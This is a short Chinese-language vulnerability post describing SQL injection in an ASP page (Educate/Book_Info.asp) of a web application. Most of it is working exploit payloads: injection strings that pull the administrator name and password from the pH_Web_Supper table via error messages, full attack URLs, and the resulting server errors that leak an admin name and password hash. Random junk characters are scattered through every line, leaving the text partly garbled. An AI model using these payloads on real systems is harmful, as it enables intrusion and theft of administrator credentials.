漏洞出现在Educate/Book_Info.asp2 t/ a2 f$ Y% Z0 `
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
/ j9 r2 E; o" cexp:如下2 w* w1 H' T( v Q
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. u9 n0 m; y5 d1 ?. S/ L1 F6 f查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 h% }) U6 M h8 H9 lhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)7 H6 |% m" I e# g1 W5 Q
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'. q! r1 s: O4 b
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
: y. y3 h" z( |: a" L/Educate/Book_Info.asp,行 84 r7 W( ~. }' \+ Z7 ?
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)% x( p! k* u5 k; _7 D6 h! N6 O
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'' j6 N5 V" ?4 J# T) n
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。9 r) Y5 B3 r+ d" ?# a1 B _
/Educate/Book_Info.asp,行 8 |